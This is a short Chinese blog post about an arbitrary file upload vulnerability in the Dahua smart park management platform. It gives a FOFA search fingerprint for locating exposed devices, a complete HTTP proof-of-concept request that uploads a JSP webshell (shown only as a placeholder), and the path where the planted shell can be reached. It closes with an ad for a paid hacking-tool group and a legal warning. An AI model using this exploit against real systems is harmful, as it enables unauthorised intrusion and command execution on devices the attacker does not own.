正文

​大华智慧园区综合管理平台存在任意文件上传漏洞

admin
admin V管理员 /0 评论 /91 阅读
1015
此篇文章发布距今已超过145天,您需要注意文章的内容或图片是否可用!
大华智慧园区设备开放了文件上传功能,但未在上传的文件类型、大小、格式、路径等方面进行严格的限制和过滤,导致攻击者可以通过构造恶意文件并上传到设备上,然后利用该漏洞获取权限并执行任意命令。

fofa指纹:WPMS/asset/lib/gridster/

漏洞POC:

POST /emap/devicePoint_addImgIco?hasSubsystem=true HTTP/1.1Host: xx.xx.xx.xxUser-Agent: python-requests/2.26.0Accept-Encoding: gzip, deflateAccept: */*Connection: Keep-AliveContent-Length: 228Content-Type: multipart/form-data; boundary=f3aeb22be281d77542546a2f71e20982--f3aeb22be281d77542546a2f71e20982Content-Disposition: form-data; name="upload"; filename="yb.jsp"Content-Type: application/octet-streamContent-Transfer-Encoding: binary(马子)--f3aeb22be281d77542546a2f71e20982--

验证过程:

马子链接:

http://xx.xx.xx.xx/upload/emap/society_new/ico_res_85c7dc2aec23_on.jsp

公众号中之前提及的所有工具,均放在APP“知识星球”,星球会员100加入,内含大量工具,包含公众号之前发过的工具,均可免费下载。另可享受本人在线教学福利。

小知识

依据《刑法》第285条第3款的规定,犯提供非法侵入或者控制计算机信息系罪的,处3年以下有期徒刑或者拘役,并处或者单处罚金;情节特别严重的,处3年以上7年以下有期徒刑,并处罚金。

声明


推荐站内搜索:最好用的开发软件、免费开源系统、渗透测试工具云盘下载、最新渗透测试资料、最新黑客工具下载……
宙飒天下网